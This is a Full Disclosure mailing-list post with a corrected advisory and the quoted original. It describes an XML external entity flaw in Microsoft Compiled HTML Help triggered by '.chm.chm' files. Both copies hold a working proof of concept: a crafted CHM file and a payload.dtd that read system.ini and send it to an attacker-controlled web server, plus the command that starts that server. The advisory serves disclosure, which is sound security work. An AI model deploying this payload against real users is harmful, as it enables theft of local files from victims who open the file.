[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFD2FDOOkdgj4w1H6C867Xt2vO3bdRgi0gaB85iUrGPSYpVBNA@mail.gmail.com>
Date: Tue, 16 Jul 2019 00:18:42 -0400
From: hyp3rlinx <apparitionsec@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Microsoft Compiled HTML Help / Uncompiled .chm File XML
External Entity
[** CORRECTION Fixed Port Typo]
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Compiled HTML Help "hh.exe"
Microsoft Compiled HTML Help is a Microsoft proprietary online help format,
consisting of a collection of HTML pages, an index and other navigation
tools.
The files are compressed and deployed in a binary format with the extension
.CHM, for Compiled HTML. The format is often used for software
documentation.
CHM is an extension for the Compiled HTML file format, most commonly used
by Microsoft's HTML-based help program.
[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
CHM Files are usually created using Microsofts "HTML Help Workshop"
program. However, I find a way to bypass using this program and create them
easily by
simply adding double .chm extension to the file ".chm.chm". Compiled HTML
Help "hh.exe" will then respect and open it processing any JS/HTML/XML
inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks
allowing remote attackers to steal and exfiltrate local system files.
Whats interesting about this one is we can create the file without using
the "Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID:
52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
While CHM is already considered a "dangerous" file type and other type of
attacks have already been documented. I thought this was an interesting way
to
create CHM files "Uncompiled" bypassing the default creation steps while
stealing local files in the process.
Note: User interaction is required to exploit this vulnerability.
[Exploit/POC]
1) python -m SimpleHTTPServer
2) "XXE.chm.chm"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>
3) "payload.dtd" (hosted in python web-server dir port 81 above)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;
Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker
Server IP is set to localhost using port 81 for PoC.
Tested successfully Windows 7/10
[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by
design"
July 16, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
On Tue, Jul 16, 2019 at 12:10 AM hyp3rlinx <apparitionsec@...il.com> wrote:
> [+] Credits: John Page (aka hyp3rlinx)
> [+] Website: hyp3rlinx.altervista.org
> [+] Source:
> http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
> [+] ISR: ApparitionSec
>
>
> [Vendor]
> www.microsoft.com
>
>
> [Product]
> Microsoft Compiled HTML Help "hh.exe"
>
> Microsoft Compiled HTML Help is a Microsoft proprietary online help
> format, consisting of a collection of HTML pages, an index and other
> navigation tools.
> The files are compressed and deployed in a binary format with the
> extension .CHM, for Compiled HTML. The format is often used for software
> documentation.
> CHM is an extension for the Compiled HTML file format, most commonly used
> by Microsoft's HTML-based help program.
>
>
> [Vulnerability Type]
> Uncompiled .CHM File XML External Entity Injection
>
>
> [CVE Reference]
> N/A
>
>
> [Security Issue]
> CHM Files are usually created using Microsofts "HTML Help Workshop"
> program. However, I find a way to bypass using this program and create them
> easily by
> simply adding double .chm extension to the file ".chm.chm". Compiled HTML
> Help "hh.exe" will then respect and open it processing any JS/HTML/XML
> inside etc.
> Compiled HTML Help is also vulnerable to XML External Entity attacks
> allowing remote attackers to steal and exfiltrate local system files.
>
> Whats interesting about this one is we can create the file without using
> the "Microsoft HTML Help Workshop" program. Also, we can steal files without
> having to use the "hhtctrl.ocx" ActiveX control CLASSID:
> 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
>
> While CHM is already considered a "dangerous" file type and other type of
> attacks have already been documented. I thought this was an interesting way
> to
> create CHM files "Uncompiled" bypassing the default creation steps while
> stealing local files in the process.
>
> Note: User interaction is required to exploit this vulnerability.
>
>
> [Exploit/POC]
> 1) python -m SimpleHTTPServer
>
>
> 2) "XXE.chm.chm"
>
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
> <HTML>
> <HEAD>
> <Title>Uncompiled CHM File XXE PoC</Title>
> </HEAD>
> <BODY>
> <xml>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE tastyexploits [
> <!ENTITY % file SYSTEM "C:\Windows\system.ini">
> <!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
> %dtd;]>
> <pwn>&send;</pwn>
> </xml>
> </BODY>
> </HTML>
>
>
> 3) "payload.dtd" (hosted in python web-server dir port 8000 above)
>
> <?xml version="1.0" encoding="UTF-8"?>
> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
> %all;
>
>
> Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker
> Server IP is set to localhost using port 81 for PoC.
>
> Tested successfully Windows 7/10
>
>
> [POC Video URL]
> https://www.youtube.com/watch?v=iaxp1iBDWXY
>
>
> [Network Access]
> Remote
>
>
>
> [Severity]
> High
>
>
> [Disclosure Timeline]
> Vendor Notification: April 25, 2019
> MSRC Response: "We determined that this behavior is considered to be by
> design"
> July 16, 2019 : Public Disclosure
>
>
>
> [+] Disclaimer
> The information contained within this advisory is supplied "as-is" with no
> warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and
> that due credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit
> is given to the author. The author is not responsible for any misuse of
> the information contained herein and accepts no responsibility
> for any damage caused by the use or misuse of this information. The author
> prohibits any malicious use of security related information
> or exploits by the author or elsewhere. All content (c).
>
> hyp3rlinx
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists